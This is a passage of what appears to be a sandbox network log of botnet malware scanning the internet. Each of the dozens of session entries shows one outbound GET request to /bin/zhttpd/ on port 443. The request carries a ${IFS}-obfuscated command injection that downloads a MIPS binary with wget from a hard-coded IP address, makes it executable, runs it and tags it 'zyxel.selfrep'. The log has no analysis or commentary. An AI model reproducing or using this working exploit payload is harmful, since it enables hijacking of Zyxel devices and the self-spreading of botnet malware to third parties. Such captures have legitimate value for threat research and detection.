                                                        321192.168.2.145751842.206.244.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:26.022089958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        322192.168.2.144422445.234.57.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:27.026134968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        323192.168.2.145002868.165.219.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:27.026179075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        324192.168.2.144414023.66.51.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:27.026206970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        325192.168.2.145232814.19.196.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:27.026249886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        326192.168.2.1437986196.115.96.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:27.026288033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        327192.168.2.1436524157.51.181.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:27.026374102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        328192.168.2.1442116194.195.203.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:27.026432037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        329192.168.2.1459242185.24.226.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:28.030065060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        330192.168.2.1456330153.247.87.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:28.030122995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        331192.168.2.1448040164.172.2.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:28.030158043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        332192.168.2.1446424157.156.45.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:28.030180931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        333192.168.2.143961470.210.1.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:28.030245066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        334192.168.2.1453010143.88.114.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:28.030278921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        335192.168.2.1439094111.49.207.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:28.030330896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        336192.168.2.143951664.122.33.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:29.034161091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        337192.168.2.1444610156.26.254.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:29.034204006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        338192.168.2.145251845.255.255.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:29.034234047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        339192.168.2.143862469.96.193.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:29.034311056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        340192.168.2.1439030154.140.231.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:29.034326077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        341192.168.2.145415637.64.253.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:30.037780046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        342192.168.2.144214469.5.209.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:30.037828922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        343192.168.2.1435398154.111.241.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:30.037837982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        344192.168.2.1455202136.75.62.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:30.037898064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        345192.168.2.1435966133.88.12.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:30.037926912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        346192.168.2.145321245.188.41.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:30.037947893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        347192.168.2.145387632.247.227.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:30.038006067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        348192.168.2.1443318130.169.151.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:30.038011074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        349192.168.2.144099092.215.59.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:30.038048029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        350192.168.2.1446656158.133.97.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:31.042196035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        351192.168.2.145849080.154.253.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:31.042243958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        352192.168.2.143738090.41.234.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:31.042248964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        353192.168.2.1460928191.215.253.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:31.042277098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        354192.168.2.143938865.205.166.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:31.042304039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        355192.168.2.145209653.68.189.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:31.042365074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        356192.168.2.143400492.211.225.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:31.042401075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        357192.168.2.14455449.196.241.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:31.042440891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        358192.168.2.144057227.50.188.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:31.042505026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        359192.168.2.145315473.137.70.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:31.042542934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        360192.168.2.145005491.139.243.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:31.042570114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        361192.168.2.1455954179.147.187.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:31.042584896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        362192.168.2.1440426159.107.172.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:31.042717934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        363192.168.2.1450860168.214.228.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:32.047462940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        364192.168.2.1452728166.164.222.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:32.047543049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        365192.168.2.1445326132.114.160.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:33.051584005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        366192.168.2.144480813.110.246.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:33.051609993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        367192.168.2.1456972179.94.203.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:33.051654100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        368192.168.2.143906086.230.50.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:33.051707029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        369192.168.2.1454960155.49.222.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:33.051779985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        370192.168.2.143438040.87.58.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:33.051786900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        371192.168.2.1437152128.95.47.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:33.051789999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        372192.168.2.145493041.53.78.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:33.051841021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        373192.168.2.1439548219.160.6.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:33.051876068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        374192.168.2.1452166101.185.171.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:33.051930904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        375192.168.2.1450166164.118.167.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:33.051935911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        376192.168.2.145230448.127.195.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:33.052097082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        377192.168.2.1444956142.24.85.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:33.052122116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        378192.168.2.145334673.250.46.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:34.056278944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        379192.168.2.1437662196.102.30.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:34.056327105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        380192.168.2.1445814108.143.1.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:34.056343079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        381192.168.2.143405424.113.49.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:34.056365967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        382192.168.2.145803692.217.223.164443
                                                        TimestampBytes transferredDirectionData
